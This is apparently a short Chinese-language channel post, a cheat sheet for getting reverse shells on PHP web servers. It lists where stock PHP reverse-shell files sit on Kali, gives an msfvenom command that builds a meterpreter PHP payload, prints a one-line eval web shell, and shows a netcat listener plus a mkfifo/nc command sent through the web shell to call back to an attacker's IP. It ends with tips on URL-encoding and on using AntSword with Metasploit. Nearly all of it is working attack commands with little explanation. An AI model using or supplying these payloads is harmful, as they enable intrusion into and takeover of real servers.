BroadcastChannel
https://channel.gandli.eu.org/
https://channel.gandli.eu.org/
#反弹shell
以下反弹shell php 文件需要需要IP和port
以下反弹shell php 文件需要需要IP和port
❯ locate php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.phpmsfvenom -p php/meterpreter/reverse_tcp LH0ST=192.168.0.131 LP0RT=4444 -f raw -o /home/kali/Desktop/revshells.php同时支持 GET、POST
<?php
@eval($_REQUEST['cmd']);
phpinfo();
?>#php #一句话木马
反弹shell
1. 开启监听
nc -lvnp 44442. nc mkfifo 连接
GET、POST:
cmd=system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP Port >/tmp/f");注意:发送前都需要进行url编码 ,hackbar\burp suite选择urlencode
#反弹shell
快速实现
metasploit-framework 开启监听,使用蚁剑As-Exploits反弹shell连接
#蚁剑